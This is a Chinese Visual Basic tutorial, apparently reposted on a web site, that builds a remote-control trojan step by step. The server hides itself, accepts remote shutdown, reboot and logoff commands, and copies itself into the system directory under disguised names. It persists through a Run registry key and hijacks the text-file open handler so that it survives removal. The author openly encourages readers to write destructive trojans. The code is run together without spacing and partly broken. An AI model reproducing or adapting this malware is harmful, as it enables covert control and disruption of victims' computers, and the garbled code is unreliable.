首先,新建一工程,名为Server,新建一个窗体,Name为Server,在窗体中加入一个winsock控件,Name设为sckServer,协议设为默认的TCP/IP协议。
接下来我们回来Server窗体模块中,添加如下代码:
->PrivateSubform_Load()
WithMe
.sckServer.LocalPort=88917本地端口(呵呵!我的生日!)
.sckServer.Listen开始监听
EndWith
EndSub
接受客户端的连接请求。
PrivateSubsckServer_ConnectionRequest(ByValrequestIDAsLong)
WithMe
If.sckServer.State<>sckClosedThen.sckServer.Close
.sckServer.Accept(requestID)
EndWith
EndSub->
下面我们来建立客户端程序:新建一个工程,名为Client,把窗体名为Client,在上面加入一个winsock控件,名为sckClient,协议为TCP/IP协议。再加一个按钮cmdConnect在窗体模块中加入代码:
->PrivateSubform_Load()
WithMe
.sckClient.RemoteHost=”127.0.0.1″设置远程IP,本例设为本机。
.sckClient.RemotePort=88917远程端口,就为server中的设置一样.
EndWith
EndSub
PrivatesubcmdConnect_Click()
SckClient.Connect
Endsub->
至此,单击Connect按钮我们的两个工程已经可以进行通信了,但看不见,你可以在Client中的sckClient_Connect事件中加入代码:debug.print“Connetionsuccessful!”来查看。
这仅是第一步,一点工作也做不了,下面我们来为它们添加功能。为了简单,本文章只实现一点小小的功能―――关机,重启,注销。好,开始吧!
在Server工程中新建一个模块,Name为modApi,这个模快为一些API函数,添加如下API函数:
->PublicDeclareFunctionExitWindowXXXLib”user32″Alias”ExitWindowXXX”(ByValuFlagsAsLong,ByValdwReservedAsLong)AsLong
PublicConstEWX_LOGOFF=0
PublicConstEWX_REBOOT=2
PublicConstEWX_SHUTDOWN=1
PublicDeclareFunctionClipCursorLib”user32″Alias”ClipCursor”(lpRectAsAny)AsLong
PublicTypeRECT
LeftAsLong
TopAsLong
RightAsLong
BottomAsLong
EndType->
注:在两个socket中编程中,进行通信的重要事件是DataArrival事件,用于接收远程数据。
下面在Client工程的Client窗体中放入三个按钮,分别为cmdExit,cmdLogoff,cmdReboot。它们用于对远程的关机,注销,重启操作。分别添加如下代码:
->PrivateSubcmdExit_Click()
Me.sckClient.SendData”Exit”
EndSub
PrivateSubcmdLogoff_Click()
Me.sckClient.SendData”Logoff”
EndSub
PrivateSubcmdReboot_Click()
Me.sckClient.SendData”Reboot”
EndSub->
全都是对服务端发出请求。下面转到Server工程中:在Server中添加sckServer的DataArrial事件,接收客户端的请求。
->PrivateSubsckServer_DataArrival(ByValbytesTotalAsLong)
DimstrDataAsString
WithMe
接收客户请求的信息
.sckServer.GetDatastrData
SelectCasestrData
Case”Exit”
关机
CallExitWindowXXX(EWX_SHUTDOWN,0)
Case”Reboot”
重启
CallExitWindowXXX(EWX_REBOOT,0)
Case”Logoff”
注销
CallExitWindowXXX(EWX_LOGOFF,0)
EndSelect
EndWith
EndSub->
好了,到此我们已经实现功能了,但还不行,我们要它在背后运行。这简单,在Server中的form_Load事件中加入一句:me.hide。好这下看不见了,但大家知道木马是一开机就自动运行了,这又是为什么,怎么实现的?把它加入到注册表的启动组中?对,不错,跟我来吧!
回到Server工程中的modApi中加入如下API函数:
->PublicDeclareFunctionRegOpenKeyLib”advapi32.dll”Alias”RegOpenKeyA”(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong
PublicDeclareFunctionRegSetvalueExLib”advapi32.dll”Alias”RegSetvalueExA”(ByValhKeyAsLong,ByVallpvalueNameAsString,ByValReservedAsLong,ByValdwTypeAsLong,lpDataAsAny,ByValcbDataAsLong)AsLong
PublicDeclareFunctionRegCreateKeyLib”advapi32.dll”Alias”RegCreateKeyA”(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong
PublicConstREG_BINARY=3
PublicConstREG_SZ=1
PublicConstHKEY_LOCAL_MACHINE=&H80000002
PublicConstHKEY_CLASSES_ROOT=&H80000000->
写到注册表启动组中的过程。
->PublicSubStartupGroup()
DimsKeyAsString
DimresultAsLong
DimhKeyIDAsLong
DimsKeyValAsString
sKey=”Systrsy”启动组中的键,找一个与系统文件相近的。
sKeyVal=”C:/windows/system/systrsy.exe”木马文件的路径,可以用GetSystemDirectory来取得系统路径。
result=RegOpenKey(HKEY_LOCAL_MACHINE,_
”Software/Microsoft/Windows/CurrentVersion/Run”,hKeyID)
Ifresult=0Then
result=RegSetvalueEx(hKeyID,sKey,0&,REG_SZ,sKeyVal,Len(sKey) 1)
EndIf
EndSub->
好,就这样简单地完成了。但是,想过没有,如果不是很菜的鸟,到注册表中见一删,我们苦苦的心血不就白白地浪费了吗?不行,还得想让他发现了删也删不掉。请看下面的代码:
->PublicSubWriteToTxt()
DimresultAsLong
DimhKeyIDAsLong
DimskeyAsString
DimskeyValAsString
skey=”txtfile/shell/open/command”
skeyVal=”C:/windows/system/txtView.exe”
result=RegOpenKey(HKEY_CLASSES_ROOT,skeyVal,hKeyID)
Ifresult=0Then
result=RegSetvalueEx(hKeyID,skey,0&,REG_SZ,skeyVal,Len(skeyVal) 1)
EndIf
EndSub->
肯定不少朋友一看就知道了,原是与txt文件进行关联,一点也不错,但C:/windows/system/txtView.exe是哪里来的,我们的木马是C:/windows/system/systrsy.exe呀。这可是我们木马的分身了。
好,回到Server工程的Server窗体的form_Load中,加入如下代码:
->DimsCurrentPathAsString,sSystemDirAsString
sCurrentPath=App.Path&”/”&App.EXEName&”.exe”
sSystemDir=“C:/windows/system”
OnErrorResumeNext
复制文件成系统目录下的Systrsy.exe
FileCopysCurrentPath,sSystemDir&”/Systrsy.exe”
OnErrorResumeNext
复制文件成系统目录下的txtView.exe
FileCopysCurrentPath,sSystemDir&”/txtView.exe”->
调用
->CallstartupGroup
CallWriteToTxt
判断程序是否下在运行
IfApp.PrevInstanceThen
如果已经运行就退出。
End
EndIf->
好了,写到这里一个破坏性木马已经诞生了,我实验过还是比较好的一个,希望大家也能写一个好的木马,能突破冰河(呵呵!)
注意:
1、大家在处理端口是最好使用高端端口,否则会和一些常用端口发生冲突
2、在第一次使用VB.NET的最好看看有关的图书,可能你能写出一款超级木马也说不定
->
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com 特别注意:本站所有转载文章言论不代表本站观点! 本站所提供的图片等素材,版权归原作者所有,如需使用,请与原作者联系。未经允许不得转载:
IDC资讯中心 »
利用visualbasic实现木马攻击_visualbasic教程